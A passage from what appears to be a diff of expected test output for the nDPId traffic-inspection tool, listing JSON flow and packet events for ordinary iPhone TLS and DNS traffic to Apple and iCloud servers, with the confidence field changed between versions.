C=US","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"D2:DA:1C:68:0C:91:A7:DB:BA:B2:2D:29:06:DB:57:42:10:3D:3A:FE"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":274,"source":"iphone.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454599396,"flow_last_seen":1582454599396,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454599396,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.137.166.35","src_port":50585,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":274,"source":"iphone.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1582454599396,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454599396,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGwFLAqAIREYmmI8WZAbu9h96xAAAAALDC\/\/9bXgAAAgQFtAEDAwcBAQgKEd\/rCQAAAAAEAgAA"} 00523{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":275,"source":"iphone.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1582454599396,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":108,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":108,"pkt_l4_len":74,"thread_ts_msec":1582454599396,"pkt":"AQBeAAD7xGGLNYKpCABFAABeopUAAP8RdUTAqAIR4AAA+xTpFOkASvALAAAAAAABAAAAAAABCF9ob21la2l0BF90Y3AFbG9jYWwAAAwAAQAAKQWgAAARlAASAAQADgAA5mGLNYKpxGGLNYKp"} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":298,"source":"iphone.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1582454599568,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":70,"pkt_l4_len":16,"thread_ts_msec":1582454599568,"pkt":"MzMAAAACxGGLNYKpht1gCzl3ABA6\/\/6AAAAAAAAACCM\/F4KYopz\/AgAAAAAAAAAAAAAAAAAChQA9fgAAAAABAcRhizWCqQ=="} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":300,"source":"iphone.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1582454599585,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454599585,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAACsGFVcRiaYjwKgCEQG7xZn\/hRwvvYfesqBS\/\/9NtwAAAgQFrAQCCArKEDlZEd\/rCQEDAws="} 
00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":303,"source":"iphone.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":3,"flow_last_seen":1582454599602,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454599602,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGwF7AqAIREYmmI8WZAbu9h96y\/4UcMIAQBAt3qQAAAQEIChHf7BTKEDlZ"} -00893{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":304,"source":"iphone.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454599396,"flow_last_seen":1582454599603,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454599603,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.137.166.35","src_port":50585,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gsa.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00893{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":304,"source":"iphone.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454599396,"flow_last_seen":1582454599603,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454599603,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.137.166.35","src_port":50585,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gsa.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":306,"source":"iphone.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454599740,"flow_last_seen":1582454599740,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454599740,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50586,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":306,"source":"iphone.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1582454599740,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454599740,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGtbvAqAIREfiwS8WaAbsCzUbDAAAAALDC\/\/+ibQAAAgQFtAEDAwcBAQgKEd\/sCwAAAAAEAgAA"} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":318,"source":"iphone.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1582454599774,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454599774,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAC0GCMAR+LBLwKgCEQG7xZq3FAeKAs1GxKBScSAgIAAAAgQFrAEBCApbEwv6Ed\/sCwEDAwU="} 
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":322,"source":"iphone.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":1582454599776,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454599776,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGtcfAqAIREfiwS8WaAbsCzUbEtxQHi4AQBAu4qgAAAQEIChHf7JdbEwv6"} -00913{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":323,"source":"iphone.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454599740,"flow_last_seen":1582454599776,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454599776,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50586,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00949{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":325,"source":"iphone.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454599396,"flow_last_seen":1582454599793,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454599793,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.137.166.35","src_port":50585,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gsa.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"c4b2785a87896e19d37eee932070cb22","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01232{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":327,"source":"iphone.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454599396,"flow_last_seen":1582454599794,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4308,"flow_avg_l4_payload_len":538,"midstream":0,"thread_ts_msec":1582454599794,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.137.166.35","src_port":50585,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gsa.apple.com","server_names":"gsas.apple.com,gsa.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"c4b2785a87896e19d37eee932070cb22","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"CN=Apple Server Authentication CA, OU=Certification Authority, O=Apple Inc., C=US","subjectDN":"CN=gsa.apple.com, O=Apple Inc., ST=California, C=US","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"D4:EF:5E:AD:7F:D5:13:5B:9F:B2:B9:84:19:75:BB:ED:53:FB:18:D6"}} 
-00971{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":330,"source":"iphone.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454599740,"flow_last_seen":1582454599811,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454599811,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50586,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01344{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":332,"source":"iphone.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454599740,"flow_last_seen":1582454599814,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4837,"flow_avg_l4_payload_len":604,"midstream":0,"thread_ts_msec":1582454599814,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50586,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","server_names":"gateway-india.icloud.com,gateway-carry.icloud.com,gateway.icloud.com,gateway-australia.icloud.com,gateway-sandbox.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","issuerDN":"CN=Apple IST CA 2 - G1, OU=Certification Authority, O=Apple Inc., C=US","subjectDN":"CN=gateway.icloud.com, O=Apple Inc., ST=California, C=US","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"D2:DA:1C:68:0C:91:A7:DB:BA:B2:2D:29:06:DB:57:42:10:3D:3A:FE"}} +00913{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":323,"source":"iphone.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454599740,"flow_last_seen":1582454599776,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454599776,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50586,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00949{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":325,"source":"iphone.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454599396,"flow_last_seen":1582454599793,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454599793,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.137.166.35","src_port":50585,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gsa.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"c4b2785a87896e19d37eee932070cb22","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01232{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":327,"source":"iphone.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454599396,"flow_last_seen":1582454599794,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4308,"flow_avg_l4_payload_len":538,"midstream":0,"thread_ts_msec":1582454599794,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.137.166.35","src_port":50585,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gsa.apple.com","server_names":"gsas.apple.com,gsa.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"c4b2785a87896e19d37eee932070cb22","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"CN=Apple Server Authentication CA, OU=Certification Authority, O=Apple Inc., 
C=US","subjectDN":"CN=gsa.apple.com, O=Apple Inc., ST=California, C=US","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"D4:EF:5E:AD:7F:D5:13:5B:9F:B2:B9:84:19:75:BB:ED:53:FB:18:D6"}} +00971{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":330,"source":"iphone.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454599740,"flow_last_seen":1582454599811,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454599811,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50586,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01344{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":332,"source":"iphone.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454599740,"flow_last_seen":1582454599814,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4837,"flow_avg_l4_payload_len":604,"midstream":0,"thread_ts_msec":1582454599814,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50586,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","server_names":"gateway-india.icloud.com,gateway-carry.icloud.com,gateway.icloud.com,gateway-australia.icloud.com,gateway-sandbox.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","issuerDN":"CN=Apple IST CA 2 - G1, OU=Certification Authority, O=Apple Inc., C=US","subjectDN":"CN=gateway.icloud.com, O=Apple Inc., ST=California, C=US","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"D2:DA:1C:68:0C:91:A7:DB:BA:B2:2D:29:06:DB:57:42:10:3D:3A:FE"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":338,"source":"iphone.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454599929,"flow_last_seen":1582454599929,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1582454599929,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":65079,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":338,"source":"iphone.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1582454599929,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1582454599929,"pkt":"xiwDYGpkxGGLNYKpCABFAABDumIAAP8Re+TAqAIRwKgCAf43ADUALyJV0zQBAAABAAAAAAAABHBsYXkGaXR1bmVzBWFwcGxlA2NvbQAAAQAB"} 
-00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":338,"source":"iphone.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454599929,"flow_last_seen":1582454599929,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1582454599929,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":65079,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"play.itunes.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":338,"source":"iphone.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454599929,"flow_last_seen":1582454599929,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1582454599929,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":65079,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"play.itunes.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00705{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":340,"source":"iphone.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1582454599930,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":241,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":241,"pkt_l4_len":207,"thread_ts_msec":1582454599930,"pkt":"xGGLNYKpxiwDYGpkCABFAADjtQsAAEARP5zAqAIBwKgCEQA1\/jcAz3eX0zSBgAABAAUAAAAABHBsYXkGaXR1bmVzBWFwcGxlA2NvbQAAAQABwAwABQABAAAMOwAmCHBsYXktY2RuDGl0dW5lcy1hcHBsZQNjb20GYWthZG5zA25ldADAMwAFAAEAAAOmACIEcGxheQZpdHVuZXMFYXBwbGUDY29tCWVkZ2VzdWl0ZcBUwGUABQABAAAAXgAUBWExODA2BGRzY2IGYWthbWFpwFTAkwABAAEAAAAOAARce00awJMAAQABAAAADgAEXHtNQA=="} -00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":340,"source":"iphone.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454599929,"flow_last_seen":1582454599930,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":1582454599930,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":65079,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"play.itunes.apple.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"92.123.77.26"}} 
+00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":340,"source":"iphone.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454599929,"flow_last_seen":1582454599930,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":1582454599930,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":65079,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"play.itunes.apple.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"92.123.77.26"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":343,"source":"iphone.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454599934,"flow_last_seen":1582454599934,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454599934,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"92.123.77.26","src_port":50587,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":343,"source":"iphone.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1582454599934,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454599934,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGzmnAqAIRXHtNGsWbAbupO4D5AAAAALDC\/\/\/ZMQAAAgQFtAEDAwcBAQgKEd\/tTwAAAAAEAgAA"} 
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":346,"source":"iphone.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1582454599967,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454599967,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADUGGW5ce00awKgCEQG7xZtUZWomqTuA+qBScSDQrwAAAgQFrAQCCAozMbcgEd\/tTwEDAwc="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":351,"source":"iphone.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":3,"flow_last_seen":1582454600080,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454600080,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGznXAqAIRXHtNGsWbAbupO4D6VGVqJ4AQBAtsOAAAAQEIChHf7eAzMbcg"} -00914{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":352,"source":"iphone.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454599934,"flow_last_seen":1582454600080,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454600080,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"92.123.77.26","src_port":50587,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"play.itunes.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 